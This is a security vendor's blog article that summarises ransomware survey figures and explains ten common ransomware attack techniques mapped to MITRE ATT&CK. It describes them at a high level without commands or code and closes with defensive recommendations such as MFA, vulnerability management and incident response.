In Arctic Wolf’s The State of Cybersecurity: 2024 Trends Report, we asked organisations what their primary area of concern was regarding cybersecurity, and for the third year running the answer was crystal clear: Ransomware.
Over half of all respondents ranked it as the number one concern their organisation faces, meaning it crossed the 50% threshold for the first time in our annual research. And, if the concern is growing, it’s for a good reason. 45% of the organisations surveyed admitted to being the victim of a ransomware attack in the past 12 months, and 91% of those faced data exfiltration as part of the attack, meaning that double- and triple-extortion tactics are now the norm, rising right alongside new norms like ransomware-as-a-service (RaaS).
With attacks and attack complexity increasing, it’s understandable that IT and security teams can feel like they’re fighting a losing battle against ransomware. But the security experts at Arctic Wolf Labs have identified ten major threat actor tactics, techniques, and procedures (TTPs) found in the majority of incident response engagements. Understanding how these TTPs are leveraged, where they fit and how they interact within the MITRE ATT&CK framework (a “globally accessible knowledge base of adversary tactics and techniques based on real-world observations”), and how you can protect your environment against them, is the first major step to safeguarding your organisation from ransomware attacks.
What Are Tactics, Techniques, and Procedures?
Tactics, Techniques, and Procedures (TTPs) refer to the patterns, activities, and methods of a threat actor or threat actor group. Simply, TTPs are how a cybercriminal conducts an attack.
There are three main parts to TTPs:
1. Tactics
Tactics are the high-level behaviour and strategy of a threat actor or threat actor group. For example, a threat actor deciding to hold an organisation for ransomware would be a tactic.
Common tactics include:
- Reconnaissance
- Delivery or exploitation
- Objective actions
2. Techniques
Tactics are realised through techniques, which are more intermediary steps in a threat actor’s plan. For example, a threat actor sending a phishing email to try to gain credentials to a system or application would be a technique.
Common techniques include:
- Network infiltration
- Lateral movement
- Malware launches
- Data transfers or modifications
3. Procedures
Procedures are the specific steps a threat actor or threat actor group takes, utilising a specific technique, to execute an attack tactic. Procedures are the most detailed and specific component of the three. Because procedures are specific to a given incident, there is no set of common procedures. However, there are broader patterns of attacks we can identify, such as launching a social engineering campaign to gain credentials to encrypt a part of the network for a ransomware attack or utilising stolen credentials to login to a user’s email account and launch a business email compromise (BEC) attack.
The Top 10 Ransomware TTPs
Stage 3: Initial Access Techniques
In the modern cybersecurity world of cloud environments and hybrid work, threat actors have become adept at evading security solutions by pivoting rapidly and employing multiple paths to value. But every breach of an environment begins somewhere, a point the cybersecurity community refers to as “initial access.” This is the third stage of attack, as defined by the MITRE ATT&CK framework (following “reconnaissance” and “resource development”). Research from Arctic Wolf Labs reveals that ransomware attacks begin with threat actors gaining initial access through TTPs like the following:
T1133 — External Remote Services
Remote services like virtual private networks (VPNs) and remote desktop protocol (RDP) enable users to connect to internal network resources from anywhere in the world with a Wi-Fi connection. These services are managed by remote service gateways which handle connections and credential authentication. Ransomware affiliates and initial access brokers will leverage these externally facing remote services to obtain initial access into the environment.
Why Threat Actors Use It
Often, these services are not adequately protected, with inadequate configuration or outright misconfigurations leaving these services exposed and vulnerable. Threat actors are often able to use brute-force or password-spraying techniques to uncover default system passwords and gain access to an organisation’s environment.
T1190 — Exploit Public-Facing Application
Public-facing applications are anything from email servers and VPN services to APIs and Microsoft Exchange Servers. Ransomware affiliates hunt for misconfigurations in these applications or try to leverage known vulnerabilities and zero days against them in the hopes these have not yet been remediated and can be used to obtain initial access.
Why Threat Actors Use It
Threat actors make disproportionate use of a relatively small collection of proven vulnerabilities — many of them more than a year old. The reason for this is simple: It takes a threat actor a great deal of time and effort to learn how to effectively exploit a particular vulnerability in a public-facing application to aid them in their ransomware attacks. Because of this learning curve, they’ll continue to use the vulnerability so long as there are environments where it hasn’t been patched or mitigated.
Stage 4: Execution
After obtaining initial access through one of the means listed in the previous section, threat actors run malicious code on the compromised endpoint, often via this popular TTP:
T1059.001 — Command and Scripting Interpreter: PowerShell
PowerShell is a Windows command-line interface and scripting environment which threat actors can abuse to achieve execution. In a threat actor’s hands, PowerShell can be used to deploy payloads, execute commands, download files from a command and control (C2) server, run credential harvesting tools, and more.
Why Threat Actors Use It
PowerShell continues to be a tool of choice within the cybercrime community for at least a few reasons:
1. PowerShell comes preinstalled on most Microsoft Windows systems targeted by threat actors, providing a convenient means of executing malicious code following initial access.
2. As a ubiquitous utility, PowerShell’s use isn’t by itself a symptom of an intrusion, which helps threat actors to evade detection by endpoint protection and monitoring solutions. By “living off the land” (LotL) — leveraging tools already used in a target environment to bypass detections and abuse allowlists — it makes it harder for security teams to investigate, as it’s more difficult to separate illegitimate use from legitimate use.
3. With some effort, PowerShell can be downgraded to an older version with reduced logging capabilities, making it even harder for security solutions to detect anomalous activity, especially when process creation and other critical events on endpoints are not externally monitored.
Stage 6: Privilege Escalation
Once threat actors have secured a foothold in your environment and established means of maintaining that access through system shutdowns, resets, and restarts, they turn their attention to expanding the scope of their attack. Here’s just one way they can do so:
T1078 — Valid Accounts
Whether gained through initial access brokers, purchased on the dark web, obtained through social engineering, or scraped from credential harvesting tools, threat actors looking to leverage this TTP are in possession of valid user credentials that grant them greater horizontal and vertical access to the environment, allowing them to enter restricted areas of networks.
Why Threat Actors Use It
Valid credentials are a golden ticket for threat actors. They require no special coding or tooling to use and are as easy as entering a username and password to execute. Given that, in 2023, 68% of all breaches involved the human element, an organisation’s people are a historically reliable target for cybercriminals. And, by using valid credentials, the threat actor gains more time and raises fewer red flags, as a valid user accessing a portion of the environment for which they have permission doesn’t cause tools to alert until that user begins behaving in unexpected, erratic ways.
Stage 7: Defense Evasion
At this stage of attack, the name of the game now is evasion. Threat actors may try to make themselves invisible, work frantically to cover their tracks, or try and impersonate another user entirely. Here’s a popular method used by many ransomware groups:
T1070:001 — Indicator Removal: Clear Windows Event Logs
As a ransomware attack progresses, artifacts are created by an adversary or their actions (think footprints in the sand). These artifacts can be used by IT and security teams to detect that an attack is happening or assess which systems have been impacted. Windows Event Logs are just such an artifact. They serve as a real-time recording of the alerts and notifications generated by an endpoint running Windows OS.
Why Threat Actors Use It
If a threat actor is able to clear Windows event logs — including system, application, and security logs — they have a better chance at evading detection and hiding their intrusion activity from IT and security teams, allowing them more time to exfiltrate data and extract a ransom.
Stage 8: Credential Access
If the valid accounts used in the privilege escalation phase did not grant the threat actor domain account control, they will now attempt to obtain those privileges using one of several TTPs, like this common one:
T1003.001 — OS Credential Dumping: LSASS Memory
When a user logs on to the network, the Local Security Authority Subsystem Service (LSASS) stores their access credentials in its process memory. Threat actors can harvest this material using open-source tools such as Mimikatz — which pulls credential information like hashes, passwords, and Kerberos tickets.
Why Threat Actors Use It
While most cybersecurity monitoring tools can detect this type of attack, it remains popular with threat actors for the sheer amount of information stored in the LSASS Memory. If successful, they will gain access to high-privilege account credentials that will allow them to create new user accounts to maintain persistence, remove accounts to improve evasion, and greatly aid in lateral movement
T1555 — Credentials from Password Stores
Depending on the target environment’s operating system (OS) or the application threat actors have breached, passwords may be stored in several places. In this TTP, cybercriminals leverage open-source applications, such as Lazagne or Mimikatz, to obtain these legitimate credentials from system stores, including Active Directory.
Why Threat Actors Use It
Credentials are stored in a variety of places, from local networks to deleted servers to domain controllers, and threat actors can attempt to access any or all of them to obtain the passwords they need to further their attack.
Stage 10: Lateral Movement
This stage is critical to a ransomware attack’s success. Without the ability to spread throughout the entire environment, encrypting or locking up all systems, threat actors are unlikely to be able to extort payment from an organisation. Lateral movement TTPs like this ensure that ability:
T1570 — Lateral Tool Transfer
To infect as many endpoints and as much of a target’s environment as possible, ransomware affiliates will distribute executables and tooling within the victim environment through lateral tool transfer. By using public file-sharing tools like Dropbox or native systems tools like the ftp (file transfer protocol) utility, threat actors can pass their attack kit across the environment, infecting endpoints and servers as they go.
Why Threat Actors Use It
Many of these tools are used legitimately by organisations and often already exist in the environment. By leveraging them for their nefarious purposes, they can corrupt systems, servers and endpoints quickly, while also — as a bonus — hiding their movements.
Stage 12: Command and Control
It’s now that the ransomware attack truly begins. The threat actor has gained access to your entire environment, gained the ability to spread their malware deep into your system, and has been able to remain inside long enough to execute the attack. Now, they communicate with their external command-and-control (C2) server, using a tool like Cobalt Strike, which issues commands to complete the attack.
T1105 — Ingress Tool Transfer
Once inside an organization’s IT environment, threat actors often need a way to download additional payloads, files, or tools to complete the attack. Ingress tool transfer is often facilitated through built-in runtime environments such as PowerShell and WScript, and sometimes takes place by abusing other built-in tools such as MSIExec or certutil.
Why Threat Actors Use It
Ingress Tool Transfer via a C2 server creates an open, unobstructed pathway for near-instant download and delivery of whatever the threat actor needs to complete their attack. Since, at this stage, they’ve no doubt been spotted by security teams, time is of the essence, and a clear delivery channel free of roadblocks is deeply appealing and highly useful.
Stage 13: Exfiltration
As ransomware attacks have grown in frequency, the cybersecurity industry and business world have increased their efforts at thwarting threat actor efforts, including everything from new security tools to restoring from backups to refusing to pay ransoms. Rather than acting as a deterrent, this has spurred innovation, leading to double extortion — where threat actors exfiltrate the data before encrypting it, then threaten to release the proprietary and private information online if the organisation won’t pay — and triple extortion, where the threat actors contact users who’ve had their data exfiltrated directly in the hopes of extracting additional payments from them.
T1567 — Exfiltration over web service
Threat actors frequently leverage public-facing tools for malicious means, and this TTP is no different. By utilising readily available tools like Google Drive or Telegram, and tools like RClone or WINSCP, they can quickly transmit large amounts of data over the internet into secure storage.
Why Threat Actors Use It
There are more secure means threat actors can employ to ensure they can make off with an organisation’s data. However, few are as easy. Many organisation’s firewalls and networks already permit outbound traffic to these types of web services, which makes exfiltration faster and more easily obfuscated.
How To Defend Against the Top 10 Ransomware TTPs
Like all attack vectors, the best defense involves a comprehensive security strategy that contains proactive and reactive components. By examining the common TTPs exploited by ransomware groups and individual threat actors, we can recommend the following actions, which should occur in parallel and continuously, to reduce your cyber risk while improving your security posture.
Identity and Access Controls
Be it through social engineering , the purchase of stolen credentials, or even a brute-force attack, access often begins with a password. In addition, credentials can be used by the threat actor to gain privileged access, allowing them to deploy ransomware into critical parts of the network.
Proactive and reactive measures security teams can take to improve credential security include:
- Implementing MFA
- Conducting dark web monitoring
- Hardening Active Directory
- Embracing the principle of least privilege access (PolP), supported by a zero trust access model, role-based access controls, and privileged access management (PAM)
- Delivering comprehensive user security awareness training
Ongoing Vulnerability Management
While zero days make headlines, it’s often known, unpatched vulnerabilities that allow threat actors to gain access to a network or system. By staying on top of vulnerabilities, an organisation goes a long way in hardening their attack surface. A full, risk-based vulnerability management program prioritizes continuous vulnerability remediation and assessment, with other components of the program complementing and assisting overall remediation and mitigation.
Managed Detection and Response (MDR)
Monitoring is critical for preventing attacks, especially as threat actors utilize legitimate programs, such as PowerShell and Active Directory, for malicious ends. Without proper monitoring and detection, unusual behavior in those programs would go unnoticed. In addition, swift detection and response capabilities allow your organisation to stop a ransomware threat while the threat actors try to gain initial access or before they can make lateral movement.
Incident Response
An insurance-approved incident response (IR) team provides the full suite of services needed to recover from a cyber attack like ransomware and quickly restore business operations to pre-incident conditions. A proper IR team will remove the threat actor from your environment, negotiate with threat actors, determine the root cause and extent of the attack, and restore critical systems.
Learn more about the ransomware ecosystem – from RaaS operators to ransom demands to how ransomware attacks work – with our interactive resource, Ransomware Explained.
Fain an in-depth understanding of some of the critical decision points organizations are faced with during a ransomware incident in our on-demand webinar, Experience Ransomware Without the Ransom.
Get an inside look at how Concierge Security experts within Arctic Wolf’s industry-leading Security Operations triage workflow investigated, escalated, and remediated a ransomware attack on a local government organization.
